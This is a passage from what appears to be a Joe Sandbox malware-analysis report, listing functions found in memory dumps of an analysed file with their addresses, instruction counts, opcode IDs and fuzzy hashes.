                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f584872d1bd5cc1e3fd2b9fba5ca9f44328f91c5a570ef0aba0d3aa37713fd54
                                                                              • Instruction ID: 271d072c611d846f63ad9c47eea8a71c7a145f2fbce0dfc0d8b3d5d2fe223eca
                                                                              • Opcode Fuzzy Hash: f584872d1bd5cc1e3fd2b9fba5ca9f44328f91c5a570ef0aba0d3aa37713fd54
                                                                              • Instruction Fuzzy Hash: B4E10FB5601B008FD725CF28D992B97B7E1FF0A708F04886DE4AACB752E735B8158B54
                                                                              Function 00AC6CBF Relevance: .4, Instructions: 384COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6735e5af1d56d8f0ccc708ed468916ff2f1abe690286a1396380b93c7b3c7d28
                                                                              • Instruction ID: 1d7d01b4fc260fffae3e8b47d400d31a4c7c4d9d92cc62390c8c63a826e34bc9
                                                                              • Opcode Fuzzy Hash: 6735e5af1d56d8f0ccc708ed468916ff2f1abe690286a1396380b93c7b3c7d28
                                                                              • Instruction Fuzzy Hash: 36D1F336A1D751CFCB24CF78D88062AB7E2BB89314F094A6ED492C7391D334DA45CB91
                                                                              Function 00AC7AB0 Relevance: .4, Instructions: 354COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6471a31e01aca4d2d5fe1e547ca1d996c86b4e7afa2acb3778ff5a08480c25f2
                                                                              • Instruction ID: b686a4182a2a1a5b2830485ac9b9f0678c80708909dcd0401cf0019f4a28472b
                                                                              • Opcode Fuzzy Hash: 6471a31e01aca4d2d5fe1e547ca1d996c86b4e7afa2acb3778ff5a08480c25f2
                                                                              • Instruction Fuzzy Hash: FBB10472A0C3508BE724DB69CC41B6FB7E5AFC4314F0A492DE99997391EA35DC048F92
                                                                              Function 00A8AF10 Relevance: .3, Instructions: 303COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9c6117061885288c1b39a5b943f8482e52345fd8b1a48c2f17ef7dcb0cf10c7c
                                                                              • Instruction ID: 9609855b4d0a98b12c384a96336f4a694d73d02a19161eb5ef41f546eb46c486
                                                                              • Opcode Fuzzy Hash: 9c6117061885288c1b39a5b943f8482e52345fd8b1a48c2f17ef7dcb0cf10c7c
                                                                              • Instruction Fuzzy Hash: 0FC189B2A187418FC360DF28DC96BABB7E1FF85318F08492DD1D9C6242E778A155CB16
                                                                              Function 00A96536 Relevance: .3, Instructions: 295COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 534ebf07acfe5e08aee461a3aa2fd79772317cc4133be239fb7a3575125354b9
                                                                              • Instruction ID: 451d6789a698d48212926f85d4b848bfe5646f86fc4d7c2f29f04bca2542800a
                                                                              • Opcode Fuzzy Hash: 534ebf07acfe5e08aee461a3aa2fd79772317cc4133be239fb7a3575125354b9
                                                                              • Instruction Fuzzy Hash: 9AB110B4600B408FD7258F24CA81B67BBF1EF4A704F14885DE8AA8BA52E735F805CB54
                                                                              Function 00AC7710 Relevance: .3, Instructions: 287COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 680b7028737082b140a37a9e8c4ecc7adcfd530bd78857f0275f48b4f38f8616
                                                                              • Instruction ID: 223b43f324b3435249c5b41f29e6a746c4d7d3443a45590e68f8c720f736f462
                                                                              • Opcode Fuzzy Hash: 680b7028737082b140a37a9e8c4ecc7adcfd530bd78857f0275f48b4f38f8616
                                                                              • Instruction Fuzzy Hash: 2B918A71A08301ABEB20DB64C881FAFBBE5FB85350F55881CF98597351E730E940CB92
                                                                              Function 00ACA0D0 Relevance: .3, Instructions: 282COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 584509b6c209880d79bd90c3b6a51cc405913e25dc7aa5ed530b2b755b76b0e0
                                                                              • Instruction ID: 23b0342ef68f184036c615e438cad4b4892eeedc5e02a4f1e0c6cc006b3bed52
                                                                              • Opcode Fuzzy Hash: 584509b6c209880d79bd90c3b6a51cc405913e25dc7aa5ed530b2b755b76b0e0
                                                                              • Instruction Fuzzy Hash: A1819C346097458FD724DF68C890F2AB7E5EF69748F16892CE4868B261E731EC11CB92
                                                                              Function 00AB64F0 Relevance: .2, Instructions: 246COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 517d2a975b6395ec8a54b275cd4e648892b8c0030c7de7aaf873de0bb0e9b2d4
                                                                              • Instruction ID: ec24a6cb21eeb5287a2ee86946d3e373c7fbd79c205cc5f51c8f335887d2ec11
                                                                              • Opcode Fuzzy Hash: 517d2a975b6395ec8a54b275cd4e648892b8c0030c7de7aaf873de0bb0e9b2d4
                                                                              • Instruction Fuzzy Hash: A971E733B29A904BC3249D7C4C923E5AA975BE6334B3EC379E9B4CB3E6D52D48064350
                                                                              Function 00AA28E9 Relevance: .2, Instructions: 244COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a9399db929d2ec430bd9f31915ba9550a1b2279352a1ae0e6830f32a0782bae2
                                                                              • Instruction ID: 245613225c6c0ea9e551676e7df0bde9778d235cba59d15544ff65a40bd72014
                                                                              • Opcode Fuzzy Hash: a9399db929d2ec430bd9f31915ba9550a1b2279352a1ae0e6830f32a0782bae2
                                                                              • Instruction Fuzzy Hash: 6B6167B44083509BD310AF59E891B2BBBF1EFA6750F08491DF4C58B2A1E379D921CB66
                                                                              Function 00AA7C00 Relevance: .2, Instructions: 243COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 435c1a98f82f501209c13d19f06eee0a2414f4d56c4fa5094d4a0a198513c486
                                                                              • Instruction ID: 938f1e10db5442a91565f2792c2126616b50b666f460b83fb5c8194a141b2f4f
                                                                              • Opcode Fuzzy Hash: 435c1a98f82f501209c13d19f06eee0a2414f4d56c4fa5094d4a0a198513c486
                                                                              • Instruction Fuzzy Hash: 8E519EB1608204ABDB20AF64CC92B7B73B5EF86764F144958F9868B2D1F375DC05CB62
                                                                              Function 00AB1860 Relevance: .2, Instructions: 217COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6d108e008403b3c92b59985e25fae4eb0cb21936506a5ffd7efe5999b9cc5533
                                                                              • Instruction ID: 988801a232243cc149ca98e07b205aac058e9a8a9b5836b39ceb2cf3b1e8b4d9
                                                                              • Opcode Fuzzy Hash: 6d108e008403b3c92b59985e25fae4eb0cb21936506a5ffd7efe5999b9cc5533
                                                                              • Instruction Fuzzy Hash: 7961D03160D341ABD714CF69C5A07AFBBEABBC5390FA4C92DE4898B352D270ED819741
                                                                              Function 00AB82D0 Relevance: .2, Instructions: 215COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 902d568f6cff8716f5b738e335a1e85c3f20be56cb074a36d1d90bfe673f43e9
                                                                              • Instruction ID: 1e2a1e7297483b167aea72ddd261510a47e250ba28dcacf9ce047458bf3dbcbc
                                                                              • Opcode Fuzzy Hash: 902d568f6cff8716f5b738e335a1e85c3f20be56cb074a36d1d90bfe673f43e9
                                                                              • Instruction Fuzzy Hash: 2E612633A5AA914BC3248A3C5C553E66A9F5BD2730F3EC365D8B58B3E6C96D4802D341
                                                                              Function 00A942FC Relevance: .2, Instructions: 206COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 975afe3188177693a53dae7cbf52a6aa5b53127994b9aea88f8fd02c06048d98
                                                                              • Instruction ID: 6fdf74c54e9a70d6fe5c0ea653173dd6ae2a7947869fbdf83f421ff4ea91e438
                                                                              • Opcode Fuzzy Hash: 975afe3188177693a53dae7cbf52a6aa5b53127994b9aea88f8fd02c06048d98
                                                                              • Instruction Fuzzy Hash: BD81E1B4810B00AFD360EF39DA47B57BEF4AB06201F504A1DE4EA97694E7306419CBE3
                                                                              Function 00ABE8A0 Relevance: .2, Instructions: 189COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 53adb1b22930f8a695f789fdc3f4b943ccd6ac5fb5c634955e3c1cdf4e3fec6a
                                                                              • Instruction ID: 9dbb9690e3b5e8079110cb7767e479d730dd72f0d18e4614a67218ff6dd2024a
                                                                              • Opcode Fuzzy Hash: 53adb1b22930f8a695f789fdc3f4b943ccd6ac5fb5c634955e3c1cdf4e3fec6a
                                                                              • Instruction Fuzzy Hash: 99518DB16083448FE314DF69D49439BBBE5BBC5318F044E2DE4E983351E379DA088B82
                                                                              Function 00AC7520 Relevance: .2, Instructions: 176COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
